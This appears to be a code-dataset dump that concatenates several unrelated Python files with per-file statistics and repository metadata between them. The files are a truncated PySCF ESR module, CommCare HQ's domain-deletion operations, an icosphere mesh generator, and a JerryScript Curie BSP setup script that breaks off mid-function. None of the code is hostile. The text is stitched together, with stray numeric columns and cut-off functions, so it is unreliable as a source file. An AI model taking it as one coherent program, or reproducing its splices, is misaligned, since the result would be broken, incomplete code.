buf = numpy.empty((4,blksize,nao))
ao_deriv = 1
for ao, mask, weight, coords \
in ni.block_loop(mol, grids, nao, ao_deriv, max_memory,
blksize=blksize, buf=buf):
rho_a = make_rho(0, ao[0], mask, 'LDA')
rho_b = make_rho(1, ao[0], mask, 'LDA')
vxc = ni.eval_xc(xc_code, (rho_a, rho_b), 1, deriv=1)[1]
vrho = vxc[0]
aow = numpy.einsum('xpi,p->xpi', ao[1:], weight*vrho[:,0])
_cross3x3_(vmat[0], mol, aow, ao[1:], mask, shls_slice, ao_loc)
aow = numpy.einsum('xpi,p->xpi', ao[1:], weight*vrho[:,1])
_cross3x3_(vmat[1], mol, aow, ao[1:], mask, shls_slice, ao_loc)
rho = vxc = vrho = aow = None
elif xctype == 'GGA':
buf = numpy.empty((10,blksize,nao))
ao_deriv = 2
for ao, mask, weight, coords \
in ni.block_loop(mol, grids, nao, ao_deriv, max_memory,
blksize=blksize, buf=buf):
rho_a = make_rho(0, ao, mask, 'GGA')
rho_b = make_rho(1, ao, mask, 'GGA')
vxc = ni.eval_xc(xc_code, (rho_a,rho_b), 1, deriv=1)[1]
wva, wvb = numint._uks_gga_wv0((rho_a, rho_b), vxc, weight)
ip_ao = ao[1:4]
ipip_ao = ao[4:]
aow = rks_grad._make_dR_dao_w(ao, wva)
_cross3x3_(vmat[0], mol, aow, ip_ao, mask, shls_slice, ao_loc)
aow = rks_grad._make_dR_dao_w(ao, wvb)
_cross3x3_(vmat[1], mol, aow, ip_ao, mask, shls_slice, ao_loc)
rho = vxc = vrho = vsigma = wv = aow = None
vmat = vmat - vmat.transpose(0,1,3,2)
else:
raise NotImplementedError('meta-GGA')
return vmat
def _cross3x3_(out, mol, ao1, ao2, mask, shls_slice, ao_loc):
out[0] += numint._dot_ao_ao(mol, ao1[1], ao2[2], mask, shls_slice, ao_loc)
out[0] -= numint._dot_ao_ao(mol, ao1[2], ao2[1], mask, shls_slice, ao_loc)
out[1] += numint._dot_ao_ao(mol, ao1[2], ao2[0], mask, shls_slice, ao_loc)
out[1] -= numint._dot_ao_ao(mol, ao1[0], ao2[2], mask, shls_slice, ao_loc)
out[2] += numint._dot_ao_ao(mol, ao1[0], ao2[1], mask, shls_slice, ao_loc)
out[2] -= numint._dot_ao_ao(mol, ao1[1], ao2[0], mask, shls_slice, ao_loc)
return out
# Jia, start to work here
class ESR(uhf_esr.ESR):
'''dE = B dot gtensor dot s'''
def __init__(self, scf_method):
uhf_esr.ESR.__init__(self, scf_method)
self.dia_soc2e = False
self.para_soc2e = False
def para(self, mo10=None, mo_coeff=None, mo_occ=None):
if mo_coeff is None: mo_coeff = self._scf.mo_coeff
if mo_occ is None: mo_occ = self._scf.mo_occ
if mo10 is None:
self.mo10, self.mo_e10 = self.solve_mo1()
mo10 = self.mo10
return para(self, mo10, mo_coeff, mo_occ)
#make_para_soc2e = make_para_soc2e
get_fock = uks_nmr.get_fock
if __name__ == '__main__':
from pyscf import gto, scf
mol = gto.M(atom='H 0 0.1 0; H 0 0 1.',
basis='ccpvdz', spin=1, charge=-1, verbose=3)
mf = scf.UKS(mol).set(xc='bp86').run()
esr_obj = ESR(mf)
esr_obj.gauge_orig = (0,0,0)
esr_obj.para_soc2e = False
esr_obj.so_eff_charge = True
print(esr_obj.kernel())
mol = gto.M(atom='''
H 0 0 1
H 1.2 0 1
H .1 1.1 0.3
H .8 .7 .6
''',
basis='ccpvdz', spin=1, charge=1, verbose=3)
mf = scf.UKS(mol).set(xc='bp86').run()
gobj = GTensor(mf)
#print(gobj.kernel())
gobj.para_soc2e = 'SSO'
gobj.dia_soc2e = None
gobj.so_eff_charge = False
nao, nmo = mf.mo_coeff[0].shape
nelec = mol.nelec
numpy.random.seed(1)
mo10 =[numpy.random.random((3,nmo,nelec[0])),
numpy.random.random((3,nmo,nelec[1]))]
print(lib.finger(para(gobj, mo10, mf.mo_coeff, mf.mo_occ)) - -2.1813250579863279e-05)
numpy.random.seed(1)
dm0 = numpy.random.random((2,nao,nao))
dm0 = dm0 + dm0.transpose(0,2,1)
dm10 = numpy.random.random((2,3,nao,nao))
dm10 = dm10 - dm10.transpose(0,1,3,2)
print(lib.finger(make_para_soc2e(gobj, dm0, dm10)) - 0.0036073897889263721)
| 36.707447
| 89
| 0.613534
| 1,128
| 6,901
| 3.580674
| 0.263298
| 0.02253
| 0.035405
| 0.040852
| 0.321862
| 0.281753
| 0.240654
| 0.235702
| 0.195098
| 0.167863
| 0
| 0.060419
| 0.246921
| 6,901
| 187
| 90
| 36.903743
| 0.71676
| 0.156354
| 0
| 0.092308
| 0
| 0
| 0.045643
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.084615
| 0
| 0.169231
| 0.023077
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe605cdea9d8787846418bf36b3fc74d17111206
| 11,661
|
py
|
Python
|
corehq/apps/domain/deletion.py
|
shyamkumarlchauhan/commcare-hq
|
99df931bcf56e9fbe15d8fcb0dc98b5a3957fb48
|
[
"BSD-3-Clause"
] | null | null | null |
corehq/apps/domain/deletion.py
|
shyamkumarlchauhan/commcare-hq
|
99df931bcf56e9fbe15d8fcb0dc98b5a3957fb48
|
[
"BSD-3-Clause"
] | null | null | null |
corehq/apps/domain/deletion.py
|
shyamkumarlchauhan/commcare-hq
|
99df931bcf56e9fbe15d8fcb0dc98b5a3957fb48
|
[
"BSD-3-Clause"
] | null | null | null |
import itertools
import logging
from datetime import date
from django.apps import apps
from django.conf import settings
from django.db import connection, transaction
from django.db.models import Q
from dimagi.utils.chunked import chunked
from corehq.apps.accounting.models import Subscription
from corehq.apps.accounting.utils import get_change_status
from corehq.apps.custom_data_fields.dbaccessors import get_by_domain_and_type
from corehq.apps.domain.utils import silence_during_tests
from corehq.apps.locations.views import LocationFieldsView
from corehq.apps.products.views import ProductFieldsView
from corehq.apps.userreports.dbaccessors import (
delete_all_ucr_tables_for_domain,
)
from corehq.apps.users.views.mobile import UserFieldsView
from corehq.blobs import CODES, get_blob_db
from corehq.blobs.models import BlobMeta
from corehq.form_processor.backends.sql.dbaccessors import doc_type_to_state
from corehq.form_processor.interfaces.dbaccessors import (
CaseAccessors,
FormAccessors,
)
from corehq.util.log import with_progress_bar
logger = logging.getLogger(__name__)
class BaseDeletion(object):
def __init__(self, app_label):
self.app_label = app_label
def is_app_installed(self):
try:
return bool(apps.get_app_config(self.app_label))
except LookupError:
return False
class CustomDeletion(BaseDeletion):
def __init__(self, app_label, deletion_fn):
super(CustomDeletion, self).__init__(app_label)
self.deletion_fn = deletion_fn
def execute(self, domain_name):
if self.is_app_installed():
self.deletion_fn(domain_name)
class RawDeletion(BaseDeletion):
def __init__(self, app_label, raw_query):
super(RawDeletion, self).__init__(app_label)
self.raw_query = raw_query
def execute(self, cursor, domain_name):
if self.is_app_installed():
cursor.execute(self.raw_query, [domain_name])
class ModelDeletion(BaseDeletion):
def __init__(self, app_label, model_name, domain_filter_kwarg):
super(ModelDeletion, self).__init__(app_label)
self.domain_filter_kwarg = domain_filter_kwarg
self.model_name = model_name
def get_model_class(self):
return apps.get_model(self.app_label, self.model_name)
def execute(self, domain_name):
if not domain_name:
# The Django orm will properly turn a None domain_name to a
# IS NULL filter. We don't want to allow deleting records for
# NULL domain names since they might have special meaning (like
# in some of the SMS models).
raise RuntimeError("Expected a valid domain name")
if self.is_app_installed():
model = self.get_model_class()
model.objects.filter(**{self.domain_filter_kwarg: domain_name}).delete()
def _delete_domain_backend_mappings(domain_name):
model = apps.get_model('sms', 'SQLMobileBackendMapping')
model.objects.filter(is_global=False, domain=domain_name).delete()
def _delete_domain_backends(domain_name):
model = apps.get_model('sms', 'SQLMobileBackend')
model.objects.filter(is_global=False, domain=domain_name).delete()
def _delete_web_user_membership(domain_name):
from corehq.apps.users.models import WebUser
active_web_users = WebUser.by_domain(domain_name)
inactive_web_users = WebUser.by_domain(domain_name, is_active=False)
for web_user in list(active_web_users) + list(inactive_web_users):
web_user.delete_domain_membership(domain_name)
if settings.UNIT_TESTING and not web_user.domain_memberships:
web_user.delete()
else:
web_user.save()
def _terminate_subscriptions(domain_name):
today = date.today()
with transaction.atomic():
current_subscription = Subscription.get_active_subscription_by_domain(domain_name)
if current_subscription:
current_subscription.date_end = today
current_subscription.is_active = False
current_subscription.save()
current_subscription.transfer_credits()
_, downgraded_privs, upgraded_privs = get_change_status(current_subscription.plan_version, None)
current_subscription.subscriber.deactivate_subscription(
downgraded_privileges=downgraded_privs,
upgraded_privileges=upgraded_privs,
old_subscription=current_subscription,
new_subscription=None,
)
Subscription.visible_objects.filter(
Q(date_start__gt=today) | Q(date_start=today, is_active=False),
subscriber__domain=domain_name,
).update(is_hidden_to_ops=True)
def _delete_all_cases(domain_name):
logger.info('Deleting cases...')
case_accessor = CaseAccessors(domain_name)
case_ids = case_accessor.get_case_ids_in_domain()
for case_id_chunk in chunked(with_progress_bar(case_ids, stream=silence_during_tests()), 500):
case_accessor.soft_delete_cases(list(case_id_chunk))
logger.info('Deleting cases complete.')
def _delete_all_forms(domain_name):
logger.info('Deleting forms...')
form_accessor = FormAccessors(domain_name)
form_ids = list(itertools.chain(*[
form_accessor.get_all_form_ids_in_domain(doc_type=doc_type)
for doc_type in doc_type_to_state
]))
for form_id_chunk in chunked(with_progress_bar(form_ids, stream=silence_during_tests()), 500):
form_accessor.soft_delete_forms(list(form_id_chunk))
logger.info('Deleting forms complete.')
def _delete_data_files(domain_name):
get_blob_db().bulk_delete(metas=list(BlobMeta.objects.partitioned_query(domain_name).filter(
parent_id=domain_name,
type_code=CODES.data_file,
)))
def _delete_custom_data_fields(domain_name):
# The CustomDataFieldsDefinition instances are cleaned up as part of the
# bulk couch delete, but we also need to clear the cache
logger.info('Deleting custom data fields...')
for field_view in [LocationFieldsView, ProductFieldsView, UserFieldsView]:
get_by_domain_and_type.clear(domain_name, field_view.field_type)
logger.info('Deleting custom data fields complete.')
# We use raw queries instead of ORM because Django queryset delete needs to
# fetch objects into memory to send signals and handle cascades. It makes deletion very slow
# if we have a millions of rows in stock data tables.
DOMAIN_DELETE_OPERATIONS = [
RawDeletion('stock', """
DELETE FROM stock_stocktransaction
WHERE report_id IN (SELECT id FROM stock_stockreport WHERE domain=%s)
"""),
RawDeletion('stock', "DELETE FROM stock_stockreport WHERE domain=%s"),
RawDeletion('stock', """
DELETE FROM commtrack_stockstate
WHERE product_id IN (SELECT product_id FROM products_sqlproduct WHERE domain=%s)
"""),
ModelDeletion('products', 'SQLProduct', 'domain'),
ModelDeletion('locations', 'SQLLocation', 'domain'),
ModelDeletion('locations', 'LocationType', 'domain'),
ModelDeletion('stock', 'DocDomainMapping', 'domain_name'),
ModelDeletion('domain_migration_flags', 'DomainMigrationProgress', 'domain'),
ModelDeletion('sms', 'DailyOutboundSMSLimitReached', 'domain'),
ModelDeletion('sms', 'SMS', 'domain'),
ModelDeletion('sms', 'SQLLastReadMessage', 'domain'),
ModelDeletion('sms', 'ExpectedCallback', 'domain'),
ModelDeletion('ivr', 'Call', 'domain'),
ModelDeletion('sms', 'Keyword', 'domain'),
ModelDeletion('sms', 'PhoneNumber', 'domain'),
ModelDeletion('sms', 'MessagingSubEvent', 'parent__domain'),
ModelDeletion('sms', 'MessagingEvent', 'domain'),
ModelDeletion('sms', 'QueuedSMS', 'domain'),
ModelDeletion('sms', 'SelfRegistrationInvitation', 'domain'),
CustomDeletion('sms', _delete_domain_backend_mappings),
ModelDeletion('sms', 'MobileBackendInvitation', 'domain'),
CustomDeletion('sms', _delete_domain_backends),
CustomDeletion('users', _delete_web_user_membership),
CustomDeletion('accounting', _terminate_subscriptions),
CustomDeletion('form_processor', _delete_all_cases),
CustomDeletion('form_processor', _delete_all_forms),
ModelDeletion('aggregate_ucrs', 'AggregateTableDefinition', 'domain'),
ModelDeletion('app_manager', 'AppReleaseByLocation', 'domain'),
ModelDeletion('app_manager', 'LatestEnabledBuildProfiles', 'domain'),
ModelDeletion('app_manager', 'ResourceOverride', 'domain'),
ModelDeletion('app_manager', 'GlobalAppConfig', 'domain'),
ModelDeletion('case_importer', 'CaseUploadRecord', 'domain'),
ModelDeletion('case_search', 'CaseSearchConfig', 'domain'),
ModelDeletion('case_search', 'CaseSearchQueryAddition', 'domain'),
ModelDeletion('case_search', 'FuzzyProperties', 'domain'),
ModelDeletion('case_search', 'IgnorePatterns', 'domain'),
ModelDeletion('cloudcare', 'ApplicationAccess', 'domain'),
ModelDeletion('consumption', 'DefaultConsumption', 'domain'),
ModelDeletion('data_analytics', 'GIRRow', 'domain_name'),
ModelDeletion('data_analytics', 'MALTRow', 'domain_name'),
ModelDeletion('data_dictionary', 'CaseType', 'domain'),
ModelDeletion('data_interfaces', 'CaseRuleAction', 'rule__domain'),
ModelDeletion('data_interfaces', 'CaseRuleCriteria', 'rule__domain'),
ModelDeletion('data_interfaces', 'CaseRuleSubmission', 'rule__domain'),
ModelDeletion('data_interfaces', 'CaseRuleSubmission', 'domain'), # TODO
ModelDeletion('data_interfaces', 'AutomaticUpdateRule', 'domain'),
ModelDeletion('data_interfaces', 'DomainCaseRuleRun', 'domain'),
ModelDeletion('domain', 'TransferDomainRequest', 'domain'),
ModelDeletion('export', 'EmailExportWhenDoneRequest', 'domain'),
CustomDeletion('export', _delete_data_files),
ModelDeletion('locations', 'LocationFixtureConfiguration', 'domain'),
ModelDeletion('ota', 'MobileRecoveryMeasure', 'domain'),
ModelDeletion('ota', 'SerialIdBucket', 'domain'),
ModelDeletion('phone', 'OwnershipCleanlinessFlag', 'domain'),
ModelDeletion('phone', 'SyncLogSQL', 'domain'),
ModelDeletion('registration', 'RegistrationRequest', 'domain'),
ModelDeletion('reminders', 'EmailUsage', 'domain'),
ModelDeletion('reports', 'ReportsSidebarOrdering', 'domain'),
ModelDeletion('smsforms', 'SQLXFormsSession', 'domain'),
ModelDeletion('translations', 'SMSTranslations', 'domain'),
ModelDeletion('translations', 'TransifexBlacklist', 'domain'),
ModelDeletion('userreports', 'AsyncIndicator', 'domain'),
ModelDeletion('users', 'DomainRequest', 'domain'),
ModelDeletion('users', 'Invitation', 'domain'),
ModelDeletion('users', 'DomainPermissionsMirror', 'source'),
ModelDeletion('zapier', 'ZapierSubscription', 'domain'),
ModelDeletion('dhis2', 'Dhis2Connection', 'domain'),
ModelDeletion('motech', 'RequestLog', 'domain'),
ModelDeletion('couchforms', 'UnfinishedSubmissionStub', 'domain'),
CustomDeletion('custom_data_fields', _delete_custom_data_fields),
CustomDeletion('ucr', delete_all_ucr_tables_for_domain),
]
def apply_deletion_operations(domain_name):
raw_ops, model_ops = _split_ops_by_type(DOMAIN_DELETE_OPERATIONS)
with connection.cursor() as cursor:
for op in raw_ops:
op.execute(cursor, domain_name)
for op in model_ops:
op.execute(domain_name)
def _split_ops_by_type(ops):
raw_ops = []
model_ops = []
for op in ops:
if isinstance(op, RawDeletion):
raw_ops.append(op)
else:
model_ops.append(op)
return raw_ops, model_ops
| 41.646429
| 108
| 0.725924
| 1,290
| 11,661
| 6.266667
| 0.256589
| 0.117516
| 0.027214
| 0.020411
| 0.17949
| 0.120732
| 0.063582
| 0.029193
| 0.029193
| 0.029193
| 0
| 0.000821
| 0.164051
| 11,661
| 279
| 109
| 41.795699
| 0.828478
| 0.047595
| 0
| 0.059091
| 0
| 0
| 0.223795
| 0.038666
| 0
| 0
| 0
| 0.003584
| 0
| 1
| 0.086364
| false
| 0
| 0.104545
| 0.004545
| 0.227273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe609a5c6fba0b3499c6abf7b2ebbe251d3d8901
| 8,056
|
py
|
Python
|
icosphere/icosphere.py
|
JackWalpole/icosahedron
|
5317d8eb9509abe275beb2693730e3efaa986672
|
[
"MIT"
] | 2
|
2017-10-02T23:36:49.000Z
|
2021-12-21T06:12:16.000Z
|
icosphere/icosphere.py
|
JackWalpole/icosphere
|
5317d8eb9509abe275beb2693730e3efaa986672
|
[
"MIT"
] | null | null | null |
icosphere/icosphere.py
|
JackWalpole/icosphere
|
5317d8eb9509abe275beb2693730e3efaa986672
|
[
"MIT"
] | null | null | null |
"""Subdivided icosahedral mesh generation"""
from __future__ import print_function
import numpy as np
# following: http://blog.andreaskahler.com/2009/06/creating-icosphere-mesh-in-code.html
# hierarchy:
# Icosphere -> Triangle -> Point
class IcoSphere:
"""
Usage: IcoSphere(level)
Maximum supported level = 8
get started with:
>>> A = IcoSphere(3)
... A.plot3d()
"""
# maximum level for subdivision of the icosahedron
maxlevel = 8
def __init__(self, level):
if type(level) is not int:
raise TypeError('level must be an integer')
elif level < 0:
raise Exception('level must be no less than 0')
elif level > self.maxlevel:
raise Exception('level larger than ' + str(self.maxlevel) + ' not supported')
self.level = level
self.points = []
self.triangles = []
self.npts = 0
################################
# initialise level 1 icosahedron
################################
# golden ration
t = (1.0 + np.sqrt(5.0)) / 2.0
# add vertices
self._addPoint(np.array([-1, t, 0]))
self._addPoint(np.array([ 1, t, 0]))
self._addPoint(np.array([-1,-t, 0]))
self._addPoint(np.array([ 1,-t, 0]))
self._addPoint(np.array([ 0,-1, t]))
self._addPoint(np.array([ 0, 1, t]))
self._addPoint(np.array([ 0,-1,-t]))
self._addPoint(np.array([ 0, 1,-t]))
self._addPoint(np.array([ t, 0,-1]))
self._addPoint(np.array([ t, 0, 1]))
self._addPoint(np.array([-t, 0,-1]))
self._addPoint(np.array([-t, 0, 1]))
# make triangles
tris = self.triangles
verts = self.points
# 5 faces around point 0
tris.append(Triangle([ verts[0],verts[11], verts[5]]))
tris.append(Triangle([ verts[0], verts[5], verts[1]]))
tris.append(Triangle([ verts[0], verts[1], verts[7]]))
tris.append(Triangle([ verts[0], verts[7],verts[10]]))
tris.append(Triangle([ verts[0],verts[10],verts[11]]))
# 5 adjacent faces
tris.append(Triangle([ verts[1], verts[5], verts[9]]))
tris.append(Triangle([ verts[5],verts[11], verts[4]]))
tris.append(Triangle([verts[11],verts[10], verts[2]]))
tris.append(Triangle([verts[10], verts[7], verts[6]]))
tris.append(Triangle([ verts[7], verts[1], verts[8]]))
# 5 faces around point 3
tris.append(Triangle([ verts[3], verts[9], verts[4]]))
tris.append(Triangle([ verts[3], verts[4], verts[2]]))
tris.append(Triangle([ verts[3], verts[2], verts[6]]))
tris.append(Triangle([ verts[3], verts[6], verts[8]]))
tris.append(Triangle([ verts[3], verts[8], verts[9]]))
# 5 adjacent faces
tris.append(Triangle([ verts[4], verts[9], verts[5]]))
tris.append(Triangle([ verts[2], verts[4],verts[11]]))
tris.append(Triangle([ verts[6], verts[2],verts[10]]))
tris.append(Triangle([ verts[8], verts[6], verts[7]]))
tris.append(Triangle([ verts[9], verts[8], verts[1]]))
########################################
# refine triangles to desired mesh level
########################################
for l in range(self.level):
midPointDict = {}
faces = []
for tri in self.triangles:
# replace triangle by 4 triangles
p = tri.pts
a = self._getMiddlePoint(p[0], p[1], midPointDict)
b = self._getMiddlePoint(p[1], p[2], midPointDict)
c = self._getMiddlePoint(p[2], p[0], midPointDict)
faces.append(Triangle([p[0], a, c]))
faces.append(Triangle([p[1], b, a]))
faces.append(Triangle([p[2], c, b]))
faces.append(Triangle([a, b, c]))
# once looped thru all triangles overwrite self.triangles
self.triangles = faces
self.nfaces = len(self.triangles)
# check that npts and nfaces are as expected
expected_npts = calculate_npts(self.level)
expected_nfaces = calculate_nfaces(self.level)
if self.npts != calculate_npts(self.level):
raise Exception('npts '+str(self.npts)+' not as expected '+str(expected_npts))
elif self.nfaces != calculate_nfaces(self.level):
raise Exception('nfaces '+str(self.nfaces)+' not as expected '+str(expected_nfaces))
def _addPoint(self, xyz):
"""Add point to self.points"""
self.points.append(Point(self.npts, xyz))
self.npts += 1
def _getMiddlePoint(self, p1, p2, midPointDict):
"""return Point"""
if not isinstance(p1, Point) or not isinstance(p2, Point):
raise TypeError('p1 and p2 must be Points')
# does point already exist?
key = tuple(sorted([p1.idx, p2.idx]))
if key in midPointDict:
# point exists
pass
else:
# point is new
self._addPoint((p1.xyz + p2.xyz)/2)
midPointDict[key] = self.points[-1]
return midPointDict[key]
def plot3d(self):
"""Matplotlib 3D plot of mesh"""
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
xyz = np.asarray([ pt.xyz for pt in self.points ])
x = xyz[:,0]
y = xyz[:,1]
z = xyz[:,2]
ts = np.asarray([ [ p.idx for p in t.pts ] for t in self.triangles ])
ax.plot_trisurf(x,y,ts,z)
plt.show()
def dump_xyz(self):
[ print(*pt.xyz) for pt in self.points ]
def dump_latlonr(self):
[ print(*cart2geo(*pt.xyz)) for pt in self.points ]
class Triangle:
"""A triangle adjoining three adjacent points"""
def __init__(self, pts):
if not isinstance(pts, list):
raise TypeError('pts must be a list')
elif len(pts) !=3:
raise Exception('pts must be of length 3')
else:
self.pts = pts
class Point:
"""A 3D point on the mesh"""
def __init__(self, idx, xyz):
if type(idx) is not int:
raise TypeError('idx must be an integer')
elif not isinstance(xyz,np.ndarray):
raise TypeError('xyz must be a numpy array')
elif xyz.size != 3:
raise Exception('xyz must be of size 3')
else:
# ensure length equals 1 and add to list of points
self.xyz = (xyz/np.linalg.norm(xyz))
self.idx = idx
def calculate_npts(level):
n = 2**level
return 2 + 10 * n**2
def calculate_nfaces(level):
n = 2**level
return 20 * n**2
def cart2geo(x, y, z):
"""convert x y z cartesian coordinates to latitude longitude radius
xyz is a numpy array, a right handed co-ordinate system is assumed with
-- x-axis going through the equator at 0 degrees longitude
-- y-axis going through the equator at 90 degrees longitude
-- z-axis going through the north pole."""
r = np.sqrt(x**2 + y**2 + z**2)
lon = np.rad2deg(np.arctan2(y,x))
lat = np.rad2deg(np.arcsin(z/r))
return lat, lon, r
def geo2cart(lat, lon, r):
"""convert latitude longitude radius to x y z cartesian coordinates
xyz is a numpy array, a right handed co-ordinate system is assumed with
-- x-axis going through the equator at 0 degrees longitude
-- y-axis going through the equator at 90 degrees longitude
-- z-axis going through the north pole."""
x = r * np.cos(lon) * np.cos(lat)
y = r * np.sin(lon) * np.cos(lat)
z = r * np.sin(lat)
return x, y, z
# def xyzToLatLonR(xyz):
# trans = np.array([np.])
| 37.64486
| 96
| 0.544067
| 1,052
| 8,056
| 4.118821
| 0.19962
| 0.077544
| 0.083083
| 0.106162
| 0.36649
| 0.291715
| 0.17586
| 0.14355
| 0.14355
| 0.14355
| 0
| 0.032816
| 0.303997
| 8,056
| 214
| 97
| 37.64486
| 0.739968
| 0.1893
| 0
| 0.037313
| 0
| 0
| 0.042502
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.089552
| false
| 0.007463
| 0.029851
| 0
| 0.186567
| 0.022388
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe6109edbf02869c5f97fef83d0ae614ddf0da76
| 8,091
|
py
|
Python
|
targets/baremetal-sdk/curie-bsp/setup.py
|
ideas-detoxes/jerryscript
|
42523bd6e2b114755498c9f68fd78545f9b33476
|
[
"Apache-2.0"
] | 4,324
|
2016-11-25T11:25:27.000Z
|
2022-03-31T03:24:49.000Z
|
targets/baremetal-sdk/curie-bsp/setup.py
|
ideas-detoxes/jerryscript
|
42523bd6e2b114755498c9f68fd78545f9b33476
|
[
"Apache-2.0"
] | 2,099
|
2016-11-25T08:08:59.000Z
|
2022-03-12T07:41:20.000Z
|
targets/baremetal-sdk/curie-bsp/setup.py
|
lygstate/jerryscript
|
55acdf2048b390d0f56f12e64dbfb2559f0e70ad
|
[
"Apache-2.0"
] | 460
|
2016-11-25T07:16:10.000Z
|
2022-03-24T14:05:29.000Z
|
#!/usr/bin/env python
# Copyright JS Foundation and other contributors, http://js.foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import fnmatch
import os
def build_soft_links(project_path, jerry_path):
""" Creates soft links into the @project_path. """
if not os.path.exists(project_path):
os.makedirs(project_path)
links = [
{ # arc
'src': os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'arc'),
'link_name': 'arc'
},
{ # include
'src': os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'include'),
'link_name': 'include'
},
{ # quark
'src': os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'quark'),
'link_name': 'quark'
},
{ # quark/jerryscript
'src': jerry_path,
'link_name': os.path.join('quark', 'jerryscript')
}
]
for link in links:
src = os.path.join(jerry_path, link['src'])
link_name = os.path.join(project_path, link['link_name'])
if not os.path.islink(link_name):
os.symlink(src, link_name)
print("Created symlink '{link_name}' -> '{src}'".format(src=src, link_name=link_name))
def find_sources(root_dir, sub_dir):
"""
Find .c and .S files inside the @root_dir/@sub_dir directory.
Note: the returned paths will be relative to the @root_dir directory.
"""
src_dir = os.path.join(root_dir, sub_dir)
matches = []
for root, dirnames, filenames in os.walk(src_dir):
for filename in fnmatch.filter(filenames, '*.[c|S]'):
file_path = os.path.join(root, filename)
relative_path = os.path.relpath(file_path, root_dir)
matches.append(relative_path)
return matches
def build_jerry_data(jerry_path):
"""
Build up a dictionary which contains the following items:
- sources: list of JerryScript sources which should be built.
- dirs: list of JerryScript dirs used.
- cflags: CFLAGS for the build.
"""
jerry_sources = []
jerry_dirs = set()
for sub_dir in ['jerry-core', 'jerry-math', os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'source')]:
for file in find_sources(os.path.normpath(jerry_path), sub_dir):
path = os.path.join('jerryscript', file)
jerry_sources.append(path)
jerry_dirs.add(os.path.split(path)[0])
jerry_cflags = [
'-DJERRY_GLOBAL_HEAP_SIZE=10',
'-DJERRY_NDEBUG',
'-DJERRY_DISABLE_HEAVY_DEBUG',
'-DJERRY_BUILTIN_NUMBER=0',
'-DJERRY_BUILTIN_STRING=0',
'-DJERRY_BUILTIN_BOOLEAN=0',
#'-DJERRY_BUILTIN_ERRORS=0',
'-DJERRY_BUILTIN_ARRAY=0',
'-DJERRY_BUILTIN_MATH=0',
'-DJERRY_BUILTIN_JSON=0',
'-DJERRY_BUILTIN_DATE=0',
'-DJERRY_BUILTIN_REGEXP=0',
'-DJERRY_BUILTIN_ANNEXB=0',
'-DJERRY_ESNEXT=0',
'-DJERRY_LCACHE=0',
'-DJERRY_PROPERTY_HASHMAP=0',
]
return {
'sources': jerry_sources,
'dirs': jerry_dirs,
'cflags': jerry_cflags,
}
def write_file(path, content):
""" Writes @content into the file at specified by the @path. """
norm_path = os.path.normpath(path)
with open(norm_path, "w+") as f:
f.write(content)
print("Wrote file '{0}'".format(norm_path))
def build_obj_y(source_list):
"""
Build obj-y additions from the @source_list.
Note: the input sources should have their file extensions.
"""
return '\n'.join(['obj-y += {0}.o'.format(os.path.splitext(fname)[0]) for fname in source_list])
def build_cflags_y(cflags_list):
"""
Build cflags-y additions from the @cflags_list.
Note: the input sources should have their file extensions.
"""
return '\n'.join(['cflags-y += {0}'.format(cflag) for cflag in cflags_list])
def build_mkdir(dir_list):
""" Build mkdir calls for each dir in the @dir_list. """
return '\n'.join(['\t$(AT)mkdir -p {0}'.format(os.path.join('$(OUT_SRC)', path)) for path in dir_list])
def create_root_kbuild(project_path):
""" Creates @project_path/Kbuild.mk file. """
root_kbuild_path = os.path.join(project_path, 'Kbuild.mk')
root_kbuild_content = '''
obj-$(CONFIG_QUARK_SE_ARC) += arc/
obj-$(CONFIG_QUARK_SE_QUARK) += quark/
'''
write_file(root_kbuild_path, root_kbuild_content)
def create_root_makefile(project_path):
""" Creates @project_path/Makefile file. """
root_makefile_path = os.path.join(project_path, 'Makefile')
root_makefile_content = '''
THIS_DIR := $(shell dirname $(abspath $(lastword $(MAKEFILE_LIST))))
T := $(abspath $(THIS_DIR)/../..)
PROJECT := {project_name}
BOARD := curie_101
ifeq ($(filter curie_101, $(BOARD)),)
$(error The curie jerry sample application can only run on the curie_101 Board)
endif
BUILDVARIANT ?= debug
quark_DEFCONFIG = $(PROJECT_PATH)/quark/defconfig
arc_DEFCONFIG = $(PROJECT_PATH)/arc/defconfig
# Optional: set the default version
VERSION_MAJOR := 1
VERSION_MINOR := 0
VERSION_PATCH := 0
include $(T)/build/project.mk
'''.format(project_name=project_name)
write_file(root_makefile_path, root_makefile_content)
def create_arc_kbuild(project_path):
""" Creates @project_path/arc/Kbuild.mk file. """
arc_path = os.path.join(project_path, 'arc')
arc_kbuild_path = os.path.join(arc_path, 'Kbuild.mk')
arc_sources = find_sources(arc_path, '.')
arc_kbuild_content = build_obj_y(arc_sources)
write_file(arc_kbuild_path, arc_kbuild_content)
def create_quark_kbuild(project_path, jerry_path):
